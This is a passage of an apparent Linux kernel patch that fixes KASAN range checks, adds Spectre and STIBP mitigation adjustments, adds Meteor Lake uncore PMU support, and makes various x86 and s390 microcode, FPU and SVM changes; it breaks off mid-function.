+ 	pmd = pmd_offset(pud, start);
+@@ -372,7 +372,7 @@ static void try_free_pud_table(p4d_t *p4d, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 
+@@ -426,7 +426,7 @@ static void try_free_p4d_table(pgd_t *pgd, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 
+diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c
+index af35052d06ed6..fbdba4c306bea 100644
+--- a/arch/s390/net/bpf_jit_comp.c
++++ b/arch/s390/net/bpf_jit_comp.c
+@@ -1393,8 +1393,16 @@ static noinline int bpf_jit_insn(struct bpf_jit *jit, struct bpf_prog *fp,
+ 		/* lg %r1,bpf_func(%r1) */
+ 		EMIT6_DISP_LH(0xe3000000, 0x0004, REG_1, REG_1, REG_0,
+ 			      offsetof(struct bpf_prog, bpf_func));
+-		/* bc 0xf,tail_call_start(%r1) */
+-		_EMIT4(0x47f01000 + jit->tail_call_start);
++		if (nospec_uses_trampoline()) {
++			jit->seen |= SEEN_FUNC;
++			/* aghi %r1,tail_call_start */
++			EMIT4_IMM(0xa70b0000, REG_1, jit->tail_call_start);
++			/* brcl 0xf,__s390_indirect_jump_r1 */
++			EMIT6_PCREL_RILC(0xc0040000, 0xf, jit->r1_thunk_ip);
++		} else {
++			/* bc 0xf,tail_call_start(%r1) */
++			_EMIT4(0x47f01000 + jit->tail_call_start);
++		}
+ 		/* out: */
+ 		if (jit->prg_buf) {
+ 			*(u16 *)(jit->prg_buf + patch_1_clrj + 2) =
+diff --git a/arch/sparc/Kconfig b/arch/sparc/Kconfig
+index 4d3d1af90d521..84437a4c65454 100644
+--- a/arch/sparc/Kconfig
++++ b/arch/sparc/Kconfig
+@@ -283,7 +283,7 @@ config ARCH_FORCE_MAX_ORDER
+ 	  This config option is actually maximum order plus one. For example,
+ 	  a value of 13 means that the largest free memory block is 2^12 pages.
+ 
+-if SPARC64
++if SPARC64 || COMPILE_TEST
+ source "kernel/power/Kconfig"
+ endif
+ 
+diff --git a/arch/x86/crypto/ghash-clmulni-intel_glue.c b/arch/x86/crypto/ghash-clmulni-intel_glue.c
+index 1f1a95f3dd0ca..c0ab0ff4af655 100644
+--- a/arch/x86/crypto/ghash-clmulni-intel_glue.c
++++ b/arch/x86/crypto/ghash-clmulni-intel_glue.c
+@@ -19,6 +19,7 @@
+ #include <crypto/internal/simd.h>
+ #include <asm/cpu_device_id.h>
+ #include <asm/simd.h>
++#include <asm/unaligned.h>
+ 
+ #define GHASH_BLOCK_SIZE	16
+ #define GHASH_DIGEST_SIZE	16
+@@ -54,15 +55,14 @@ static int ghash_setkey(struct crypto_shash *tfm,
+ 			const u8 *key, unsigned int keylen)
+ {
+ 	struct ghash_ctx *ctx = crypto_shash_ctx(tfm);
+-	be128 *x = (be128 *)key;
+ 	u64 a, b;
+ 
+ 	if (keylen != GHASH_BLOCK_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* perform multiplication by 'x' in GF(2^128) */
+-	a = be64_to_cpu(x->a);
+-	b = be64_to_cpu(x->b);
++	a = get_unaligned_be64(key);
++	b = get_unaligned_be64(key + 8);
+ 
+ 	ctx->shash.a = (b << 1) | (a >> 63);
+ 	ctx->shash.b = (a << 1) | (b >> 63);
+diff --git a/arch/x86/events/intel/ds.c b/arch/x86/events/intel/ds.c
+index 88e58b6ee73c0..91b214231e03c 100644
+--- a/arch/x86/events/intel/ds.c
++++ b/arch/x86/events/intel/ds.c
+@@ -2,12 +2,14 @@
+ #include <linux/bitops.h>
+ #include <linux/types.h>
+ #include <linux/slab.h>
++#include <linux/sched/clock.h>
+ 
+ #include <asm/cpu_entry_area.h>
+ #include <asm/perf_event.h>
+ #include <asm/tlbflush.h>
+ #include <asm/insn.h>
+ #include <asm/io.h>
++#include <asm/timer.h>
+ 
+ #include "../perf_event.h"
+ 
+@@ -1519,6 +1521,27 @@ static u64 get_data_src(struct perf_event *event, u64 aux)
+ 	return val;
+ }
+ 
++static void setup_pebs_time(struct perf_event *event,
++			    struct perf_sample_data *data,
++			    u64 tsc)
++{
++	/* Converting to a user-defined clock is not supported yet. */
++	if (event->attr.use_clockid != 0)
++		return;
++
++	/*
++	 * Doesn't support the conversion when the TSC is unstable.
++	 * The TSC unstable case is a corner case and very unlikely to
++	 * happen. If it happens, the TSC in a PEBS record will be
++	 * dropped and fall back to perf_event_clock().
++	 */
++	if (!using_native_sched_clock() || !sched_clock_stable())
++		return;
++
++	data->time = native_sched_clock_from_tsc(tsc) + __sched_clock_offset;
++	data->sample_flags |= PERF_SAMPLE_TIME;
++}
++
+ #define PERF_SAMPLE_ADDR_TYPE	(PERF_SAMPLE_ADDR |		\
+ 				 PERF_SAMPLE_PHYS_ADDR |	\
+ 				 PERF_SAMPLE_DATA_PAGE_SIZE)
+@@ -1668,11 +1691,8 @@ static void setup_pebs_fixed_sample_data(struct perf_event *event,
+ 	 *
+ 	 * We can only do this for the default trace clock.
+ 	 */
+-	if (x86_pmu.intel_cap.pebs_format >= 3 &&
+-		event->attr.use_clockid == 0) {
+-		data->time = native_sched_clock_from_tsc(pebs->tsc);
+-		data->sample_flags |= PERF_SAMPLE_TIME;
+-	}
++	if (x86_pmu.intel_cap.pebs_format >= 3)
++		setup_pebs_time(event, data, pebs->tsc);
+ 
+ 	if (has_branch_stack(event)) {
+ 		data->br_stack = &cpuc->lbr_stack;
+@@ -1735,10 +1755,7 @@ static void setup_pebs_adaptive_sample_data(struct perf_event *event,
+ 	perf_sample_data_init(data, 0, event->hw.last_period);
+ 	data->period = event->hw.last_period;
+ 
+-	if (event->attr.use_clockid == 0) {
+-		data->time = native_sched_clock_from_tsc(basic->tsc);
+-		data->sample_flags |= PERF_SAMPLE_TIME;
+-	}
++	setup_pebs_time(event, data, basic->tsc);
+ 
+ 	/*
+ 	 * We must however always use iregs for the unwinder to stay sane; the
+diff --git a/arch/x86/events/intel/uncore.c b/arch/x86/events/intel/uncore.c
+index 459b1aafd4d4a..27b34f5b87600 100644
+--- a/arch/x86/events/intel/uncore.c
++++ b/arch/x86/events/intel/uncore.c
+@@ -1765,6 +1765,11 @@ static const struct intel_uncore_init_fun adl_uncore_init __initconst = {
+ 	.mmio_init = adl_uncore_mmio_init,
+ };
+ 
++static const struct intel_uncore_init_fun mtl_uncore_init __initconst = {
++	.cpu_init = mtl_uncore_cpu_init,
++	.mmio_init = adl_uncore_mmio_init,
++};
++
+ static const struct intel_uncore_init_fun icx_uncore_init __initconst = {
+ 	.cpu_init = icx_uncore_cpu_init,
+ 	.pci_init = icx_uncore_pci_init,
+@@ -1832,6 +1837,8 @@ static const struct x86_cpu_id intel_uncore_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,		&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&adl_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE,		&mtl_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE_L,	&mtl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ATOM_TREMONT_D,	&snr_uncore_init),
+diff --git a/arch/x86/events/intel/uncore.h b/arch/x86/events/intel/uncore.h
+index e278e2e7c051a..305a54d88beee 100644
+--- a/arch/x86/events/intel/uncore.h
++++ b/arch/x86/events/intel/uncore.h
+@@ -602,6 +602,7 @@ void skl_uncore_cpu_init(void);
+ void icl_uncore_cpu_init(void);
+ void tgl_uncore_cpu_init(void);
+ void adl_uncore_cpu_init(void);
++void mtl_uncore_cpu_init(void);
+ void tgl_uncore_mmio_init(void);
+ void tgl_l_uncore_mmio_init(void);
+ void adl_uncore_mmio_init(void);
+diff --git a/arch/x86/events/intel/uncore_snb.c b/arch/x86/events/intel/uncore_snb.c
+index 1f4869227efb9..7fd4334e12a17 100644
+--- a/arch/x86/events/intel/uncore_snb.c
++++ b/arch/x86/events/intel/uncore_snb.c
+@@ -109,6 +109,19 @@
+ #define PCI_DEVICE_ID_INTEL_RPL_23_IMC		0xA728
+ #define PCI_DEVICE_ID_INTEL_RPL_24_IMC		0xA729
+ #define PCI_DEVICE_ID_INTEL_RPL_25_IMC		0xA72A
++#define PCI_DEVICE_ID_INTEL_MTL_1_IMC		0x7d00
++#define PCI_DEVICE_ID_INTEL_MTL_2_IMC		0x7d01
++#define PCI_DEVICE_ID_INTEL_MTL_3_IMC		0x7d02
++#define PCI_DEVICE_ID_INTEL_MTL_4_IMC		0x7d05
++#define PCI_DEVICE_ID_INTEL_MTL_5_IMC		0x7d10
++#define PCI_DEVICE_ID_INTEL_MTL_6_IMC		0x7d14
++#define PCI_DEVICE_ID_INTEL_MTL_7_IMC		0x7d15
++#define PCI_DEVICE_ID_INTEL_MTL_8_IMC		0x7d16
++#define PCI_DEVICE_ID_INTEL_MTL_9_IMC		0x7d21
++#define PCI_DEVICE_ID_INTEL_MTL_10_IMC		0x7d22
++#define PCI_DEVICE_ID_INTEL_MTL_11_IMC		0x7d23
++#define PCI_DEVICE_ID_INTEL_MTL_12_IMC		0x7d24
++#define PCI_DEVICE_ID_INTEL_MTL_13_IMC		0x7d28
+ 
+ 
+ #define IMC_UNCORE_DEV(a)						\
+@@ -205,6 +218,32 @@
+ #define ADL_UNC_ARB_PERFEVTSEL0			0x2FD0
+ #define ADL_UNC_ARB_MSR_OFFSET			0x8
+ 
++/* MTL Cbo register */
++#define MTL_UNC_CBO_0_PER_CTR0			0x2448
++#define MTL_UNC_CBO_0_PERFEVTSEL0		0x2442
++
++/* MTL HAC_ARB register */
++#define MTL_UNC_HAC_ARB_CTR			0x2018
++#define MTL_UNC_HAC_ARB_CTRL			0x2012
++
++/* MTL ARB register */
++#define MTL_UNC_ARB_CTR				0x2418
++#define MTL_UNC_ARB_CTRL			0x2412
++
++/* MTL cNCU register */
++#define MTL_UNC_CNCU_FIXED_CTR			0x2408
++#define MTL_UNC_CNCU_FIXED_CTRL			0x2402
++#define MTL_UNC_CNCU_BOX_CTL			0x240e
++
++/* MTL sNCU register */
++#define MTL_UNC_SNCU_FIXED_CTR			0x2008
++#define MTL_UNC_SNCU_FIXED_CTRL			0x2002
++#define MTL_UNC_SNCU_BOX_CTL			0x200e
++
++/* MTL HAC_CBO register */
++#define MTL_UNC_HBO_CTR				0x2048
++#define MTL_UNC_HBO_CTRL			0x2042
++
+ DEFINE_UNCORE_FORMAT_ATTR(event, event, "config:0-7");
+ DEFINE_UNCORE_FORMAT_ATTR(umask, umask, "config:8-15");
+ DEFINE_UNCORE_FORMAT_ATTR(chmask, chmask, "config:8-11");
+@@ -598,6 +637,115 @@ void adl_uncore_cpu_init(void)
+ 	uncore_msr_uncores = adl_msr_uncores;
+ }
+ 
++static struct intel_uncore_type mtl_uncore_cbox = {
++	.name		= "cbox",
++	.num_counters   = 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_CBO_0_PER_CTR0,
++	.event_ctl	= MTL_UNC_CBO_0_PERFEVTSEL0,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_hac_arb = {
++	.name		= "hac_arb",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_HAC_ARB_CTR,
++	.event_ctl	= MTL_UNC_HAC_ARB_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_arb = {
++	.name		= "arb",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_ARB_CTR,
++	.event_ctl	= MTL_UNC_ARB_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_hac_cbox = {
++	.name		= "hac_cbox",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_HBO_CTR,
++	.event_ctl	= MTL_UNC_HBO_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static void mtl_uncore_msr_init_box(struct intel_uncore_box *box)
++{
++	wrmsrl(uncore_msr_box_ctl(box), SNB_UNC_GLOBAL_CTL_EN);
++}
++
++static struct intel_uncore_ops mtl_uncore_msr_ops = {
++	.init_box	= mtl_uncore_msr_init_box,
++	.disable_event	= snb_uncore_msr_disable_event,
++	.enable_event	= snb_uncore_msr_enable_event,
++	.read_counter	= uncore_msr_read_counter,
++};
++
++static struct intel_uncore_type mtl_uncore_cncu = {
++	.name		= "cncu",
++	.num_counters   = 1,
++	.num_boxes	= 1,
++	.box_ctl	= MTL_UNC_CNCU_BOX_CTL,
++	.fixed_ctr_bits = 48,
++	.fixed_ctr	= MTL_UNC_CNCU_FIXED_CTR,
++	.fixed_ctl	= MTL_UNC_CNCU_FIXED_CTRL,
++	.single_fixed	= 1,
++	.event_mask	= SNB_UNC_CTL_EV_SEL_MASK,
++	.format_group	= &icl_uncore_clock_format_group,
++	.ops		= &mtl_uncore_msr_ops,
++	.event_descs	= icl_uncore_events,
++};
++
++static struct intel_uncore_type mtl_uncore_sncu = {
++	.name		= "sncu",
++	.num_counters   = 1,
++	.num_boxes	= 1,
++	.box_ctl	= MTL_UNC_SNCU_BOX_CTL,
++	.fixed_ctr_bits	= 48,
++	.fixed_ctr	= MTL_UNC_SNCU_FIXED_CTR,
++	.fixed_ctl	= MTL_UNC_SNCU_FIXED_CTRL,
++	.single_fixed	= 1,
++	.event_mask	= SNB_UNC_CTL_EV_SEL_MASK,
++	.format_group	= &icl_uncore_clock_format_group,
++	.ops		= &mtl_uncore_msr_ops,
++	.event_descs	= icl_uncore_events,
++};
++
++static struct intel_uncore_type *mtl_msr_uncores[] = {
++	&mtl_uncore_cbox,
++	&mtl_uncore_hac_arb,
++	&mtl_uncore_arb,
++	&mtl_uncore_hac_cbox,
++	&mtl_uncore_cncu,
++	&mtl_uncore_sncu,
++	NULL
++};
++
++void mtl_uncore_cpu_init(void)
++{
++	mtl_uncore_cbox.num_boxes = icl_get_cbox_num();
++	uncore_msr_uncores = mtl_msr_uncores;
++}
++
+ enum {
+ 	SNB_PCI_UNCORE_IMC,
+ };
+@@ -1264,6 +1412,19 @@ static const struct pci_device_id tgl_uncore_pci_ids[] = {
+ 	IMC_UNCORE_DEV(RPL_23),
+ 	IMC_UNCORE_DEV(RPL_24),
+ 	IMC_UNCORE_DEV(RPL_25),
++	IMC_UNCORE_DEV(MTL_1),
++	IMC_UNCORE_DEV(MTL_2),
++	IMC_UNCORE_DEV(MTL_3),
++	IMC_UNCORE_DEV(MTL_4),
++	IMC_UNCORE_DEV(MTL_5),
++	IMC_UNCORE_DEV(MTL_6),
++	IMC_UNCORE_DEV(MTL_7),
++	IMC_UNCORE_DEV(MTL_8),
++	IMC_UNCORE_DEV(MTL_9),
++	IMC_UNCORE_DEV(MTL_10),
++	IMC_UNCORE_DEV(MTL_11),
++	IMC_UNCORE_DEV(MTL_12),
++	IMC_UNCORE_DEV(MTL_13),
+ 	{ /* end: all zeroes */ }
+ };
+ 
+diff --git a/arch/x86/events/zhaoxin/core.c b/arch/x86/events/zhaoxin/core.c
+index 949d845c922b4..3e9acdaeed1ec 100644
+--- a/arch/x86/events/zhaoxin/core.c
++++ b/arch/x86/events/zhaoxin/core.c
+@@ -541,7 +541,13 @@ __init int zhaoxin_pmu_init(void)
+ 
+ 	switch (boot_cpu_data.x86) {
+ 	case 0x06:
+-		if (boot_cpu_data.x86_model == 0x0f || boot_cpu_data.x86_model == 0x19) {
++		/*
++		 * Support Zhaoxin CPU from ZXC series, exclude Nano series through FMS.
++		 * Nano FMS: Family=6, Model=F, Stepping=[0-A][C-D]
++		 * ZXC FMS: Family=6, Model=F, Stepping=E-F OR Family=6, Model=0x19, Stepping=0-3
++		 */
++		if ((boot_cpu_data.x86_model == 0x0f && boot_cpu_data.x86_stepping >= 0x0e) ||
++			boot_cpu_data.x86_model == 0x19) {
+ 
+ 			x86_pmu.max_period = x86_pmu.cntval_mask >> 1;
+ 
+diff --git a/arch/x86/include/asm/fpu/sched.h b/arch/x86/include/asm/fpu/sched.h
+index b2486b2cbc6e0..c2d6cd78ed0c2 100644
+--- a/arch/x86/include/asm/fpu/sched.h
++++ b/arch/x86/include/asm/fpu/sched.h
+@@ -39,7 +39,7 @@ extern void fpu_flush_thread(void);
+ static inline void switch_fpu_prepare(struct fpu *old_fpu, int cpu)
+ {
+ 	if (cpu_feature_enabled(X86_FEATURE_FPU) &&
+-	    !(current->flags & PF_KTHREAD)) {
++	    !(current->flags & (PF_KTHREAD | PF_IO_WORKER))) {
+ 		save_fpregs_to_fpstate(old_fpu);
+ 		/*
+ 		 * The save operation preserved register state, so the
+diff --git a/arch/x86/include/asm/fpu/xcr.h b/arch/x86/include/asm/fpu/xcr.h
+index 9656a5bc6feae..9a710c0604457 100644
+--- a/arch/x86/include/asm/fpu/xcr.h
++++ b/arch/x86/include/asm/fpu/xcr.h
+@@ -5,7 +5,7 @@
+ #define XCR_XFEATURE_ENABLED_MASK	0x00000000
+ #define XCR_XFEATURE_IN_USE_MASK	0x00000001
+ 
+-static inline u64 xgetbv(u32 index)
++static __always_inline u64 xgetbv(u32 index)
+ {
+ 	u32 eax, edx;
+ 
+@@ -27,7 +27,7 @@ static inline void xsetbv(u32 index, u64 value)
+  *
+  * Callers should check X86_FEATURE_XGETBV1.
+  */
+-static inline u64 xfeatures_in_use(void)
++static __always_inline u64 xfeatures_in_use(void)
+ {
+ 	return xgetbv(XCR_XFEATURE_IN_USE_MASK);
+ }
+diff --git a/arch/x86/include/asm/microcode.h b/arch/x86/include/asm/microcode.h
+index d5a58bde091c8..320566a0443db 100644
+--- a/arch/x86/include/asm/microcode.h
++++ b/arch/x86/include/asm/microcode.h
+@@ -125,13 +125,13 @@ static inline unsigned int x86_cpuid_family(void)
+ #ifdef CONFIG_MICROCODE
+ extern void __init load_ucode_bsp(void);
+ extern void load_ucode_ap(void);
+-void reload_early_microcode(void);
++void reload_early_microcode(unsigned int cpu);
+ extern bool initrd_gone;
+ void microcode_bsp_resume(void);
+ #else
+ static inline void __init load_ucode_bsp(void)			{ }
+ static inline void load_ucode_ap(void)				{ }
+-static inline void reload_early_microcode(void)			{ }
++static inline void reload_early_microcode(unsigned int cpu)	{ }
+ static inline void microcode_bsp_resume(void)			{ }
+ #endif
+ 
+diff --git a/arch/x86/include/asm/microcode_amd.h b/arch/x86/include/asm/microcode_amd.h
+index ac31f9140d07d..e6662adf3af4d 100644
+--- a/arch/x86/include/asm/microcode_amd.h
++++ b/arch/x86/include/asm/microcode_amd.h
+@@ -47,12 +47,12 @@ struct microcode_amd {
+ extern void __init load_ucode_amd_bsp(unsigned int family);
+ extern void load_ucode_amd_ap(unsigned int family);
+ extern int __init save_microcode_in_initrd_amd(unsigned int family);
+-void reload_ucode_amd(void);
++void reload_ucode_amd(unsigned int cpu);
+ #else
+ static inline void __init load_ucode_amd_bsp(unsigned int family) {}
+ static inline void load_ucode_amd_ap(unsigned int family) {}
+ static inline int __init
+ save_microcode_in_initrd_amd(unsigned int family) { return -EINVAL; }
+-static inline void reload_ucode_amd(void) {}
++static inline void reload_ucode_amd(unsigned int cpu) {}
+ #endif
+ #endif /* _ASM_X86_MICROCODE_AMD_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index d3fe82c5d6b66..978a3e203cdbb 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -49,6 +49,10 @@
+ #define SPEC_CTRL_RRSBA_DIS_S_SHIFT	6	   /* Disable RRSBA behavior */
+ #define SPEC_CTRL_RRSBA_DIS_S		BIT(SPEC_CTRL_RRSBA_DIS_S_SHIFT)
+ 
++/* A mask for bits which the kernel toggles when controlling mitigations */
++#define SPEC_CTRL_MITIGATIONS_MASK	(SPEC_CTRL_IBRS | SPEC_CTRL_STIBP | SPEC_CTRL_SSBD \
++							| SPEC_CTRL_RRSBA_DIS_S)
++
+ #define MSR_IA32_PRED_CMD		0x00000049 /* Prediction Command */
+ #define PRED_CMD_IBPB			BIT(0)	   /* Indirect Branch Prediction Barrier */
+ 
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index 4e35c66edeb7d..a77dee6a2bf2e 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -697,7 +697,8 @@ bool xen_set_default_idle(void);
+ #endif
+ 
+ void __noreturn stop_this_cpu(void *dummy);
+-void microcode_check(void);
++void microcode_check(struct cpuinfo_x86 *prev_info);
++void store_cpu_caps(struct cpuinfo_x86 *info);
+ 
+ enum l1tf_mitigations {
+ 	L1TF_MITIGATION_OFF,
+diff --git a/arch/x86/include/asm/reboot.h b/arch/x86/include/asm/reboot.h
+index 04c17be9b5fda..bc5b4d788c08d 100644
+--- a/arch/x86/include/asm/reboot.h
++++ b/arch/x86/include/asm/reboot.h
+@@ -25,6 +25,8 @@ void __noreturn machine_real_restart(unsigned int type);
+ #define MRR_BIOS	0
+ #define MRR_APM		1
+ 
++void cpu_emergency_disable_virtualization(void);
++
+ typedef void (*nmi_shootdown_cb)(int, struct pt_regs*);
+ void nmi_panic_self_stop(struct pt_regs *regs);
+ void nmi_shootdown_cpus(nmi_shootdown_cb callback);
+diff --git a/arch/x86/include/asm/special_insns.h b/arch/x86/include/asm/special_insns.h
+index 35f709f619fb4..c2e322189f853 100644
+--- a/arch/x86/include/asm/special_insns.h
++++ b/arch/x86/include/asm/special_insns.h
+@@ -295,7 +295,7 @@ static inline int enqcmds(void __iomem *dst, const void *src)
+ 	return 0;
+ }
+ 
+-static inline void tile_release(void)
++static __always_inline void tile_release(void)
+ {
+ 	/*
+ 	 * Instruction opcode for TILERELEASE; supported in binutils
+diff --git a/arch/x86/include/asm/virtext.h b/arch/x86/include/asm/virtext.h
+index 8757078d4442a..3b12e6b994123 100644
+--- a/arch/x86/include/asm/virtext.h
++++ b/arch/x86/include/asm/virtext.h
+@@ -126,7 +126,21 @@ static inline void cpu_svm_disable(void)
+ 
+ 	wrmsrl(MSR_VM_HSAVE_PA, 0);
+ 	rdmsrl(MSR_EFER, efer);
+-	wrmsrl(MSR_EFER, efer & ~EFER_SVME);
++	if (efer & EFER_SVME) {
++		/*
++		 * Force GIF=1 prior to disabling SVM to ensure INIT and NMI
++		 * aren't blocked, e.g. if a fatal error occurred between CLGI
++		 * and STGI.  Note, STGI may #UD if SVM is disabled from NMI
++		 * context between reading EFER and executing STGI.  In that
++		 * case, GIF must already be set, otherwise the NMI would have
++		 * been blocked, so just eat the fault.
++		 */
++		asm_volatile_goto("1: stgi\n\t"
++				  _ASM_EXTABLE(1b, %l[fault])
++				  ::: "memory" : fault);
++fault:
++		wrmsrl(MSR_EFER, efer & ~EFER_SVME);
++	}
+ }
+ 
+ /** Makes sure SVM is disabled, if it is supported on the CPU
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 907cc98b19380..518bda50068cb 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -188,6 +188,17 @@ static int acpi_register_lapic(int id, u32 acpiid, u8 enabled)
+ 	return cpu;
+ }
+ 
++static bool __init acpi_is_processor_usable(u32 lapic_flags)
++{
++	if (lapic_flags & ACPI_MADT_ENABLED)
++		return true;
++
++	if (acpi_support_online_capable && (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++		return true;
++
++	return false;
++}
++
+ static int __init
+ acpi_parse_x2apic(union acpi_subtable_headers *header, const unsigned long end)
+ {
+@@ -212,6 +223,10 @@ acpi_parse_x2apic(union acpi_subtable_headers *header, const unsigned long end)
+ 	if (apic_id == 0xffffffff)
+ 		return 0;
+ 
++	/* don't register processors that cannot be onlined */
++	if (!acpi_is_processor_usable(processor->lapic_flags))
++		return 0;
++
+ 	/*
+ 	 * We need to register disabled CPU as well to permit
+ 	 * counting disabled CPUs. This allows us to size
+@@ -250,9 +265,7 @@ acpi_parse_lapic(union acpi_subtable_headers * header, const unsigned long end)
+ 		return 0;
+ 
+ 	/* don't register processors that can not be onlined */
+-	if (acpi_support_online_capable &&
+-	    !(processor->lapic_flags & ACPI_MADT_ENABLED) &&
+-	    !(processor->lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++	if (!acpi_is_processor_usable(processor->lapic_flags))
+ 		return 0;
+ 
+ 	/*
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index bca0bd8f48464..daad10e7665bf 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -144,9 +144,17 @@ void __init check_bugs(void)
+ 	 * have unknown values. AMD64_LS_CFG MSR is cached in the early AMD
+ 	 * init code as it is not enumerated and depends on the family.
+ 	 */
+-	if (boot_cpu_has(X86_FEATURE_MSR_SPEC_CTRL))
++	if (cpu_feature_enabled(X86_FEATURE_MSR_SPEC_CTRL)) {
+ 		rdmsrl(MSR_IA32_SPEC_CTRL, x86_spec_ctrl_base);
+ 
++		/*
++		 * Previously running kernel (kexec), may have some controls
++		 * turned ON. Clear them and let the mitigations setup below
++		 * rediscover them based on configuration.
++		 */
++		x86_spec_ctrl_base &= ~SPEC_CTRL_MITIGATIONS_MASK;
++	}
++
+ 	/* Select the proper CPU mitigations before patching alternatives: */
+ 	spectre_v1_select_mitigation();
+ 	spectre_v2_select_mitigation();
+@@ -1124,14 +1132,18 @@ spectre_v2_parse_user_cmdline(void)
+ 	return SPECTRE_V2_USER_CMD_AUTO;
+ }
+ 
+-static inline bool spectre_v2_in_ibrs_mode(enum spectre_v2_mitigation mode)
++static inline bool spectre_v2_in_eibrs_mode(enum spectre_v2_mitigation mode)
+ {
+-	return mode == SPECTRE_V2_IBRS ||
+-	       mode == SPECTRE_V2_EIBRS ||
++	return mode == SPECTRE_V2_EIBRS ||
+ 	       mode == SPECTRE_V2_EIBRS_RETPOLINE ||
+ 	       mode == SPECTRE_V2_EIBRS_LFENCE;
+ }
+ 
++static inline bool spectre_v2_in_ibrs_mode(enum spectre_v2_mitigation mode)
++{
++	return spectre_v2_in_eibrs_mode(mode) || mode == SPECTRE_V2_IBRS;
++}
++
+ static void __init
+ spectre_v2_user_select_mitigation(void)
+ {
+@@ -1194,12 +1206,19 @@ spectre_v2_user_select_mitigation(void)
+ 	}
+ 
+ 	/*
+-	 * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
+-	 * STIBP is not required.
++	 * If no STIBP, enhanced IBRS is enabled, or SMT impossible, STIBP
++	 * is not required.
++	 *
++	 * Enhanced IBRS also protects against cross-thread branch target
++	 * injection in user-mode as the IBRS bit remains always set which
++	 * implicitly enables cross-thread protections.  However, in legacy IBRS
++	 * mode, the IBRS bit is set only on kernel entry and cleared on return
++	 * to userspace. This disables the implicit cross-thread protection,
++	 * so allow for STIBP to be selected in that case.
+ 	 */
+ 	if (!boot_cpu_has(X86_FEATURE_STIBP) ||
+ 	    !smt_possible ||
+-	    spectre_v2_in_ibrs_mode(spectre_v2_enabled))
++	    spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+ 		return;
+ 
+ 	/*
+@@ -2327,7 +2346,7 @@ static ssize_t mmio_stale_data_show_state(char *buf)
+ 
+ static char *stibp_state(void)
+ {
+-	if (spectre_v2_in_ibrs_mode(spectre_v2_enabled))
++	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+ 		return "";
+ 
+ 	switch (spectre_v2_user_stibp) {
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index f3cc7699e1e1b..6a25e93f2a87c 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -2302,30 +2302,45 @@ void cpu_init_secondary(void)
+ #endif
+ 
+ #ifdef CONFIG_MICROCODE_LATE_LOADING
+-/*
++/**
++ * store_cpu_caps() - Store a snapshot of CPU capabilities
++ * @curr_info: Pointer where to store it
++ *
++ * Returns: None
++ */
++void store_cpu_caps(struct cpuinfo_x86 *curr_info)
++{
++	/* Reload CPUID max function as it might've changed. */
